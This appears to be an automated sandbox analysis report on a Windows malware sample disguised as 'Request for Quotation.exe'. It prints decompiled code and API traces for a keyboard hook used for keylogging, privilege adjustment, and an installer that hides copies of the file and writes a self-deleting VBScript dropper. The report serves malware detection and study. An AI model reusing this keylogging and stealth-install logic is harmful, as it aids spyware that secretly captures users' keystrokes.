                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ManagerStart
                                                                                • String ID:
                                                                                • API String ID: 3595611540-0
                                                                                • Opcode ID: 0cc14d108f04878674a6d267668b74455fb6495d903e3efe619db27e090fbd46
                                                                                • Instruction ID: 0126697ef4a7dd551ba317b87bbb1749c3aaf445346a94cf1b379eb6c3c08625
                                                                                • Opcode Fuzzy Hash: 0cc14d108f04878674a6d267668b74455fb6495d903e3efe619db27e090fbd46
                                                                                • Instruction Fuzzy Hash: 04F06D71110528FFD3106FB1EC88DFF3F6CEE893A47044025F90692160CB749E869AE9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040EC0F, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 84%
                                                                                			E0040EC0F() {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				signed int _t14;

				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
				_t14 = GetLastError();
				asm("sbb eax, eax");
				return  ~( ~_t14);
			}







                                                                                0x0040ec23
                                                                                0x0040ec35
                                                                                0x0040ec46
                                                                                0x0040ec4d
                                                                                0x0040ec54
                                                                                0x0040ec5a
                                                                                0x0040ec62
                                                                                0x0040ec68

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000028,?,0041B310,?,?,?,?,?,0040DF86), ref: 0040EC1C
                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,0040DF86), ref: 0040EC23
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040EC35
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0040EC54
                                                                                • GetLastError.KERNEL32 ref: 0040EC5A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                • String ID: SeShutdownPrivilege
                                                                                • API String ID: 3534403312-3733053543
                                                                                • Opcode ID: c00110eb4c6ec2bacec55e51135d224bb90ade642968878b66c6ed2f365041fe
                                                                                • Instruction ID: 48ce616a36d9155281e91bb523584d4266b4366c7e509a05eb39360af07fb4fb
                                                                                • Opcode Fuzzy Hash: c00110eb4c6ec2bacec55e51135d224bb90ade642968878b66c6ed2f365041fe
                                                                                • Instruction Fuzzy Hash: EFF01271941129FBDB00ABE0ED0DAEF7EBCEB49744F104120B906E1090C6749A08CAA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409D02, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 24COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00409D02(void** _a4) {
				void* _t4;
				long _t5;
				struct HRSRC__* _t7;

				_t7 = FindResourceA(0, "SETTINGS", 0xa);
				_t4 = LockResource(LoadResource(0, _t7));
				_t5 = SizeofResource(0, _t7);
				 *_a4 = _t4;
				return _t5;
			}






                                                                                0x00409d16
                                                                                0x00409d22
                                                                                0x00409d2d
                                                                                0x00409d37
                                                                                0x00409d3b

                                                                                APIs
                                                                                • FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 00409D10
                                                                                • LoadResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D1B
                                                                                • LockResource.KERNEL32(00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D22
                                                                                • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D2D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                • String ID: SETTINGS
                                                                                • API String ID: 3473537107-594951305
                                                                                • Opcode ID: 48e65bcaf9e34f3bd4814d5b8f3278eefd50652902c2b44e954c88ebdafe90fb
                                                                                • Instruction ID: dff85c0b1422ab4955d2beb391fe13d27272d16ce83a247481c219f138c774b2
                                                                                • Opcode Fuzzy Hash: 48e65bcaf9e34f3bd4814d5b8f3278eefd50652902c2b44e954c88ebdafe90fb
                                                                                • Instruction Fuzzy Hash: 27E09A31641714EBD6101BE5AC0DFDA7E78EBCAB63F0140A5FA098B1D0C561440086A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040532D, Relevance: 4.6, APIs: 3, Instructions: 63keyboardCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040532D(struct HHOOK__** _a4, int _a8, int _a12, void* _a16) {
				void* _t19;
				void* _t26;
				struct HHOOK__** _t32;
				signed int _t33;

				_t32 = _a4;
				_t33 = 5;
				memcpy( &(_t32[0x10]), _a16, _t33 << 2);
				if(_a8 == 0) {
					_t19 = _a12 - 0x100;
					if(_t19 == 0) {
						if(GetKeyState(0x14) == 0 || GetKeyState(0x14) == 0xff80) {
							_t32[0xb] = _t32[0xb] & 0x00000000;
						} else {
							_t32[0xb] = 1;
						}
						E00406BA7(_t32);
						E00406BCB(_t32);
						E00405EB2(_t32);
						if(_t32[0xb] == 0) {
							E00406952(_t32);
						}
						_t32[0xb] = _t32[0xb] & 0x00000000;
					} else {
						_t26 = _t19 - 1;
						if(_t26 == 0) {
							E00406BB9(_t32);
							E00406BDD(_t32);
							E00406B61(_t32);
						} else {
							if(_t26 == 3) {
								E00406AD1(_t32);
							}
						}
					}
				}
				return CallNextHookEx( *_t32, _a8, _a12, _a16);
			}







                                                                                0x00405335
                                                                                0x00405342
                                                                                0x00405343
                                                                                0x00405345
                                                                                0x0040534a
                                                                                0x0040534f
                                                                                0x00405386
                                                                                0x00405398
                                                                                0x00405392
                                                                                0x00405392
                                                                                0x00405392
                                                                                0x0040539e
                                                                                0x004053a5
                                                                                0x004053ac
                                                                                0x004053b5
                                                                                0x004053b9
                                                                                0x004053b9
                                                                                0x004053be
                                                                                0x00405351
                                                                                0x00405351
                                                                                0x00405352
                                                                                0x00405364
                                                                                0x0040536b
                                                                                0x00405372
                                                                                0x00405354
                                                                                0x00405357
                                                                                0x0040535b
                                                                                0x0040535b
                                                                                0x00405357
                                                                                0x00405352
                                                                                0x0040534f
                                                                                0x004053d7

                                                                                APIs
                                                                                • GetKeyState.USER32(00000014), ref: 00405381
                                                                                • GetKeyState.USER32(00000014), ref: 0040538A
                                                                                  • Part of subcall function 00406AD1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415D38,?), ref: 00406B51
                                                                                • CallNextHookEx.USER32 ref: 004053CD
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: StateV?$allocator@$??0?$basic_string@CallD@1@@D@2@@std@@D@std@@HookNextU?$char_traits@
                                                                                • String ID:
                                                                                • API String ID: 98962008-0
                                                                                • Opcode ID: c30bd8d7f5eb3adc70798307367016ec926e5b8f9707ec8e3c3983b96fba1221
                                                                                • Instruction ID: db2238219e7acabf410f467048d0031229e8bae0499535dbb57e9f22420807a3
                                                                                • Opcode Fuzzy Hash: c30bd8d7f5eb3adc70798307367016ec926e5b8f9707ec8e3c3983b96fba1221
                                                                                • Instruction Fuzzy Hash: A0118E7520461996DF10AF3588817AF3A21EB85344F05547EB9426A2C2CABC98259B5D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405156, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00405156(void* __ecx) {
				signed int _t3;
				signed int _t4;
				intOrPtr _t6;
				intOrPtr _t7;
				void* _t8;

				_t8 = __ecx;
				_t3 = GetKeyboardLayout(0);
				_t4 = _t3 & 0x000003ff;
				_t6 = 9;
				if(_t4 == _t6) {
					L3:
					 *((intOrPtr*)(_t8 + 0x38)) = _t6;
					return _t4;
				} else {
					_t7 = 0x10;
					if(_t4 != _t7) {
						goto L3;
					} else {
						 *((intOrPtr*)(_t8 + 0x38)) = _t7;
						return _t4;
					}
				}
			}








                                                                                0x00405157
                                                                                0x0040515b
                                                                                0x00405163
                                                                                0x00405168
                                                                                0x0040516c
                                                                                0x0040517b
                                                                                0x0040517b
                                                                                0x0040517f
                                                                                0x0040516e
                                                                                0x00405170
                                                                                0x00405174
                                                                                0x00000000
                                                                                0x00405176
                                                                                0x00405176
                                                                                0x0040517a
                                                                                0x0040517a
                                                                                0x00405174

                                                                                APIs
                                                                                • GetKeyboardLayout.USER32(00000000), ref: 0040515B
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: KeyboardLayout
                                                                                • String ID:
                                                                                • API String ID: 194098044-0
                                                                                • Opcode ID: 735f306a23b8debe55fd3af3f4c285691be61ff21da7241a1c559ef9645d9055
                                                                                • Instruction ID: 21b9efa670f21c68742e6ddf4daf796ac161ac54f97a083ce8069b5058884fb0
                                                                                • Opcode Fuzzy Hash: 735f306a23b8debe55fd3af3f4c285691be61ff21da7241a1c559ef9645d9055
                                                                                • Instruction Fuzzy Hash: 27D05E36948B204EE764A618B882BE232A0EB94731F95443BE5821AAD4E5A468C20658
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004124A0, Relevance: .0, Instructions: 16COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 84%
                                                                                			E004124A0(intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _t6;
				intOrPtr _t7;
				intOrPtr* _t10;

				_t10 = _a4;
				_t6 = _a8;
				asm("cpuid");
				 *_t10 = _t6;
				 *((intOrPtr*)(_t10 + 4)) = _t7;
				 *((intOrPtr*)(_t10 + 8)) = 0;
				 *((intOrPtr*)(_t10 + 0xc)) = __edx;
				return _t6;
			}






                                                                                0x004124a5
                                                                                0x004124a8
                                                                                0x004124ad
                                                                                0x004124af
                                                                                0x004124b1
                                                                                0x004124b4
                                                                                0x004124b7
                                                                                0x004124bd

                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
                                                                                • Instruction ID: 43cdf4ecb647160fda175e5076d83385583e07dd488e496ff266cef725db0fb4
                                                                                • Opcode Fuzzy Hash: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
                                                                                • Instruction Fuzzy Hash: 7ED092B1509719AFDB288F5AE480896FBE8EE48274750C42EE8AE97700C231A8408B90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00407E37, Relevance: 142.1, APIs: 70, Strings: 11, Instructions: 326fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • wcslen.MSVCRT ref: 00407E46
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407E5D
                                                                                • CreateDirectoryW.KERNEL32(00000000), ref: 00407E64
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BC68,00415A24,?), ref: 00407E77
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 00407E84
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 00407E94
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407E9D
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407EC2
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ECB
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ED3
                                                                                • wcscmp.MSVCRT ref: 00407EE0
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 00407EF1
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407F1D
                                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\Request for Quotation.exe,00000000), ref: 00407F25
                                                                                • wcslen.MSVCRT ref: 00407F40
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00415A24,?), ref: 00407F65
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415A24,?), ref: 00407F72
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F7D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F86
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F8F
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407FAB
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407FB4
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407FBE
                                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\Request for Quotation.exe,00000000), ref: 00407FC6
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(C:\Users\user\Desktop\Request for Quotation.exe), ref: 00407FD3
                                                                                  • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00407FE5
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000007), ref: 00408010
                                                                                • SetFileAttributesW.KERNEL32(00000000), ref: 0040801D
                                                                                • wcslen.MSVCRT ref: 00408022
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000007), ref: 00408034
                                                                                • SetFileAttributesW.KERNEL32(00000000), ref: 0040803B
                                                                                • _wgetenv.MSVCRT ref: 0040804B
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00408056
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408061
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040806C
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(WScript.Sleep 1000,?), ref: 0040807E
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject")), ref: 0040808C
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(C:\Users\user\Desktop\Request for Quotation.exe,?,00415628,0041623C), ref: 004080B0
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ,?,00415628,00000000), ref: 004080C4
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080CF
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004080DC
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080E9
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080F6
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408102
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040810B
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408114
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040811D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408126
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040812F
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408138
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 0040814B
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",?,0041BA28,00000000), ref: 00408163
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040816E
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040817B
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408188
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408194
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040819D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081A6
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081AF
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081B8
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081C1
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 004081CF
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004081DB
                                                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 004081E5
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004081F1
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 0040820F
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040821C
                                                                                • exit.MSVCRT ref: 00408228
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408231
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040823A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@$G@2@@0@Hstd@@V?$basic_string@$?c_str@?$basic_string@$V01@V10@$??0?$basic_string@G@1@@$V01@@$??4?$basic_string@$FileY?$basic_string@$V10@0@wcslen$AttributesCopy$?length@?$basic_string@CreateDirectoryExecuteShell_wgetenvexitwcscmp
                                                                                • String ID: """, 0$6$C:\Users\user\Desktop\Request for Quotation.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open
                                                                                • API String ID: 740851534-1532156180
                                                                                • Opcode ID: 25a4468c4bedb9d25f6c62a780da0af2a7d65bb534f9a9386c322f7da57d4325
                                                                                • Instruction ID: 2c5ee03a622c4f430e0af795343514bbf493609e2573cf328c1cc28c00924062
                                                                                • Opcode Fuzzy Hash: 25a4468c4bedb9d25f6c62a780da0af2a7d65bb534f9a9386c322f7da57d4325
                                                                                • Instruction Fuzzy Hash: 57C15D7290051DEBCB04AFE0EC49DEE7B3CFF54345B44802AF916A71A0EB789945CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00407E37, Relevance: 140.3, APIs: 70, Strings: 10, Instructions: 326fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • wcslen.MSVCRT ref: 00407E46
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407E5D
                                                                                • CreateDirectoryW.KERNEL32(00000000), ref: 00407E64
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BC68,00415A24,?), ref: 00407E77
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 00407E84
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 00407E94
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407E9D
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407EC2
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ECB
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ED3
                                                                                • wcscmp.MSVCRT ref: 00407EE0
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 00407EF1
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407F1D
                                                                                • CopyFileW.KERNEL32(0041BA5C,00000000), ref: 00407F25
                                                                                • wcslen.MSVCRT ref: 00407F40
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00415A24,?), ref: 00407F65
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415A24,?), ref: 00407F72
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F7D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F86
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F8F
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407FAB
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407FB4
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407FBE
                                                                                • CopyFileW.KERNEL32(0041BA5C,00000000), ref: 00407FC6
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(0041BA5C), ref: 00407FD3
                                                                                  • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00407FE5
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000007), ref: 00408010
                                                                                • SetFileAttributesW.KERNEL32(00000000), ref: 0040801D
                                                                                • wcslen.MSVCRT ref: 00408022
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000007), ref: 00408034
                                                                                • SetFileAttributesW.KERNEL32(00000000), ref: 0040803B
                                                                                • _wgetenv.MSVCRT ref: 0040804B
